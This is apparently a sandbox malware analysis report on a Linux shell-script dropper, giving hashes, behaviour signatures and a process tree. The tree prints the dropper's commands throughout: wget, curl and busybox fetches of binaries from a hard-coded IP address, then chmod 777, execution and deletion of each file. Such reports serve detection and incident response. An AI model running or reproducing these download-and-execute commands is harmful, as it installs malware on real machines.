Analysis
-
max time kernel
8s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
-
Size
10KB
-
MD5
e85cfec36f14cf1239aeb4b66816d9b6
-
SHA1
54996a37402bd68d4d9592629ba35466aa659e7b
-
SHA256
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
-
SHA512
300a5cf3328c8392a91bc401ade0843b0d426078b4a7d026b0cfa6bc9959bb8f607eb8cdd63250e780224fc8cb68aea66d2993f7ad08286732684e392cfcf415
-
SSDEEP
192:S9G+eTfUXv3+Cs6BK+u+K+j+2+e+Z9p1gG+BFUp1gGC1xQTfUXvt+Cs6E+u+K+j+:S9G+Hcr+BFOC1xq
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1529 chmod 1595 chmod 1601 chmod 1607 chmod 1667 chmod 1517 chmod 1547 chmod 1625 chmod 1631 chmod 1571 chmod 1589 chmod 1613 chmod 1673 chmod 1559 chmod 1577 chmod 1583 chmod 1619 chmod 1661 chmod 1535 chmod 1649 chmod 1655 chmod 1523 chmod 1541 chmod 1565 chmod 1553 chmod 1637 chmod 1643 chmod 1679 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 1518 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 1524 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 1530 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 1536 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 1542 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 1548 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 1554 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 1560 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 1566 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 1572 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 1578 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 1584 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 1590 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 1596 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu 1602 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY 1608 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 1614 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR 1620 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ 1626 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z 1632 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI 1638 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 1644 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf 1650 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk 1656 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh 1662 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC 1668 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR 1674 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx 1680 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx curl File opened for modification /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ curl File opened for modification /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 curl File opened for modification /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR curl File opened for modification /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu curl File opened for modification /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf curl File opened for modification /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC curl File opened for modification /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 curl File opened for modification /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl File opened for modification /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z curl File opened for modification /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk curl File opened for modification /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh curl File opened for modification /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY curl
Processes
-
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh1⤵PID:1508
-
/bin/rm/bin/rm bins.sh2⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:1513
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:1518
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:1519
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:1520
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:1522
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:1525
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:1526
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:1528
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:1531
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:1532
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:1534
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:1537
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1540
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1543
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1546
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:1549
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1552
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:1555
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1558
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:1561
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1564
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:1567
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1570
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:1573
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:1576
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:1579
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:1582
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:1585
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:1586
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:1588
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:1591
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:1594
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:1597
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:1600
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:1603
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:1606
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:1609
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:1610
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:1612
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:1615
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:1618
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:1621
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:1624
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:1627
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:1630
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:1636
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:1642
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:1648
-
-
